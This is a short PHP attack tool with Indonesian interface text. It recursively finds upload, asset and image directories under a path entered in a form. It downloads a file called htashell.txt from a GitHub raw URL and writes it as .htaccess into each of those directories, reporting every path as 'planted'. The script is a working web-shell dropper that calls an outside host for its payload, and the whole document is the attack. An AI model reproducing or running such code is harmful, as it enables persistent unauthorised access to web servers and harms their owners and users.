<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $targetPath = rtrim($_POST['path'] ?? '', '/');
    if (empty($targetPath) || !is_dir($targetPath)) {
        echo "Path tidak valid atau tidak ditemukan.";
        exit;
    }

    $dirNames = ['upload', 'uploads', 'asset', 'assets', 'file', 'files', 'image', 'images']; 
    $foundDirs = [];

    // Cari direktori yang sesuai
    $rii = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($targetPath)); 
    foreach ($rii as $file) { 
        if ($file->isDir()) { 
            $dirname = strtolower($file->getFilename()); 
            if (in_array($dirname, $dirNames)) { 
                $foundDirs[] = $file->getPathname();
            }
        }
    }

    // Download menggunakan cURL
    $url = "https://raw.githubusercontent.com/Lucenox/Essentials/refs/heads/main/htashell.txt";
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $content = curl_exec($ch);
    if ($content === false) {
        echo "Gagal mengambil file dari URL.";
        exit;
    }
    curl_close($ch);

    $results = [];

    foreach ($foundDirs as $dir) {
        $filePath = rtrim($dir, '/') . "/.htaccess";
        $result = file_put_contents($filePath, $content);
        if ($result !== false) {
            $results[] = "path -> $filePath berhasil di tanam";
        } else {
            $results[] = "path -> $filePath gagal di tanam";
        }
    }

    echo "<pre>result\n" . implode("\n", $results) . "</pre>";
} else {
?>
<form method="POST">
    <label>Masukkan path target:</label>
    <input type="text" name="path" placeholder="/var/www/html" required>
    <button type="submit">Proses</button>
</form>
<?php
}
?>
